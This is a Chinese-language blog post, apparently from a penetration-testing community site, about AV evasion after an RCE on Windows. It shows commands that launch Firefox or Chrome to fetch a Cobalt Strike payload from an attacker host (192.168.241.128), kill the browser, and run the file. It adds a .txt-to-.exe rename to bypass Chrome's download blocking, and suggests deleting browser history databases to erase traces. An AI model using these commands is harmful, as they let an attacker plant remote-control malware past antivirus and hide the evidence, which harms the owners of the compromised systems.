前言:
拿到一个RCE漏洞,只能命令执行,利用场景及其有限,想要上传我们的CS来上线,但是在Windows中,像curl/certutil/powershell/wget命令都不免杀,怎么办?只要学会利用游览器进行后渗透,就能一招鲜吃遍天,目前经测试,包括某60、某绒、defender,都不会对该行为进行拦截,虽然类似的技术分享,之前也有师傅发过,但是这种利用方式其实并非主流,还是有很多兄弟不知道的,导致杀软没有专门对其进行行为查杀,现在某些游览器,例如Chrome,是会对游览器下载的行为进行拦截的,本文也会提供一种“船新”的思路进行绕过。
测试环境:
目前我用的是Windows Server自带的Defender+某60+某绒,且已经全部都已经升级到了最新版本,包括我们今天的主角游览器,测试用的Edge、火狐、Chrome游览器都已经升级到了最新版本,以验证我们方法的现行可行性,直到本文发出去的这段时间都是有效的。
利用前提条件:
实验结果如下:
"C:\Program Files\Mozilla Firefox\firefox.exe" http://192.168.241.128/qax.exe
taskkill /im firefox.exe /f && C:\Users\test\Downloads\qax.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" http://192.168.241.128/qax.txt
taskkill /im chrome.exe /f && copy C:\Users\test\Downloads\qax.txt C:\Users\test\Downloads\qax.exe && C:\Users\test\Downloads\qax.exe
深入利用探索:
这时有兄弟就问了,你这游览器下载会有痕迹呀,其实这个是可以删除的,不过要管理员权限,我记得只要篡改或者删除游览器AppData下的一些db文件就可以实现,游览历史记录和文件下载的内容都可以删除,其实市面上已经有很多相关的文章了,这里就不延展了,感兴趣的兄弟可以自行探索。
6 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!